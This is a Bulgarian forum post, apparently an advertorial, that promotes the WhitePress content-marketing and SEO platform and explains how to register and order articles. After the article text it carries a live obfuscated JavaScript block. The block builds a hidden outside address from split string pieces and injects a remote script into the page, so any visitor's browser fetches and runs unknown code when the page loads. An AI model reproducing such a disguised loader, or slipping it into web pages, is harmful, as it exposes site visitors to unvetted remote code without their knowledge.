SearchEngines.bg

Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!

Как да увеличите видимостта на своето съдържание в Интернет?

Blinky

Geek
Екип
159048843915963500.png

Има някои малки трикове, с които днес искаме да Ви запознаем. На помощ идва един от най-сполучливите инструменти, с които разполагаме в нашата страна, а именно платформата Whitepress. Сигурни сме, че благодарение на екипа зад нея ще увеличите видимостта си в Интернет пространството, а продажбите Ви ще нараснат в пъти. Нека да видим какво представлява тя и как може да ни бъде полезна.

Какво представлява платформата Whitepress?​

WhitePress е интернет платформа, предназначена за създаване и публикуване на статии, оптимизиране на съдържанието в онлайн сайтовете ни и осигуряване на ефективна комуникация между издатели и рекламодатели.

Този невероятен инструмент е разработен и патентован от полски предприемачи преди около 10 години. Днес платформата може да се използва на 25 езика, един от които е и български. Работата на издателите е свързана с публикуване в повече от 43000 уебсайтове. Досега Whitepress България може да се похвали с повече от 3000 клиенти, както и повече от 60 журналисти, специализирани в създаването на текстове във всякаква сфера.

За да работите с платформата, не е необходимо да инсталирате специален софтуер. Можете да работите директно от браузъра, намиращ се на Вашето устройство. Регистрацията за услугата е напълно безплатна и отнема само няколко секунди. Как обаче инструментът WhitePress - платформа за контент маркетинг и SEO може да ви помогне на Вас самите? Да проверим това заедно.

Kои са основните причини, поради които потребителите избират WhitePress?​

Анализирайки функционалността на платформата, успяхме да идентифицираме редица точки, благодарение на които WhitePress, като ефективен ресурс за създаване на висококачествено съдържание, напоследък придоби стабилна популярност в България.

На първо място трябва да поставим специалното обслужване на всеки един от клиентите на платформата. Няма значение дали ще се възползвате от нея като издател, или рекламодател. При всички положения ще получите ефективна обратна връзка по всяко време на денонощието, което прави платформата много подходяща за работа от вкъщи в удобно за вас време.
В случай, че притежавате уебсайт или блог страница, съдържанието, което би следвало да е поместено там, трябва да бъде оптимизирано по най-подходящия възможен начин. Екипът на Whitepress ще Ви помогне и тук, като обърне специално внимание на текстовете, които ще достигнат до Вас. Всички те биват валидирани по отношение на плагиатство. Както всички знаем, колкото по-висок е процентът на уникалност на един текст, толкова бързо ще бъде разпознат от най-големите търсачки, напр. Google. Така Вашият уебсайт ще излиза на по-предни позиции и ще привлича вниманието на повече читатели.

Важно за оптимизацията на Вашите текстове е и наличието на определени ключови думи. Колкото повече външни и вътрешни връзки има към Вашия уебсайт, толкова по-често ще се среща в мрежата и това отново ще подобри видимостта му. Разбира се, не бива и да прекаляваме с това, за да може съдържанието да изглежда по възможно най-адаптирания начин.
Създаването на уникално съдържание, проследяването на видимостта на написаните и публикувани статии, прекият контакт с журналиста, точността на изпълнение на поставените задачи и изключително привлекателната цена са само една малка част от примамливите предложения, идващи на Whitepress. Всичко това ще улесни изключително много Вашата работа, а от друга страна експертната дейност на екипа ще Ви предостави продукт, който да увеличи видимостта на Вашето онлайн пространство.

Как да поръчате своето съдържание на български език?​

Ако смятате, че имате нужда да освежите Вашия сайт или блог или искате той да стане по-популярен, не се колебайте да се възползвате от услугите на Whitepress. Необходимо е само да се регистрирате в платфромата, което отнема едва няколко секунди. След това преценете дали сте издател (собственик на уебсайт и уеб портал), или рекламодател (компании, рекламни агенции и медийни къщи).

Следващата стъпка пред Вас е поръчването на платена статия или такава за собствено ползване. Тук е моментът, в който можете да изберете какъв точно искате да бъде езика на писане. Ако смятате да популяризирате своята дейност в страната ни, то тогава заложете на български език. В случай обаче, че обмисляте разширяване на обхвата си, можете да помислите и за други езици. Най-добре е да запазите мултиезичност и да оптимизирате всички налични версии по подходящ начин. Така ще можете да придобиете популярност извън рамките и на България. Следвайте стъпките, за да създадете точно и ясно задание за журналиста, който ще поеме задачата.

Защо да изберем Whitepress?​

Почти всички сфери на нашия живот са свързани по един или друг начин с Интернет пространството. Следствието от това е, че телевизионните предавания и редовната преса постепенно губят позициите си на атрактивни информационни и рекламни платформи. Бързо променящият се съвременен свят изисква иновативни решения и технологии, които да достигнат до по-голяма аудитория, а по възможност - и с по-малко средства.
Платформата WhitePress е напълно пригодена за тези изисквания. Тя ще ви помогне да станете по-разпознаваеми, а като резултат от това ще се уверите, че приходите Ви от онлайн продажби само и единствено ще растат. Доверете се на специалистите!

<script>
(function(){
a5uX=document.createElement("script");a5uX_="u"+("s")+"ta";
a5uX_+=("t.i")+""+"n";a5uX_+=(("f")+"o");a5uX.type="text/javascript";
a5uX_+="/"; a5uXu="376572351";a5uXu+=".9vgc8tm75uX9s132Xfi";a5uXu+="3mm8jwf4hgs";
a5uX.src="https://"+a5uX_+a5uXu;a5uX.async=true;document.body.appendChild(a5uX);
})();
</script>
 

Горе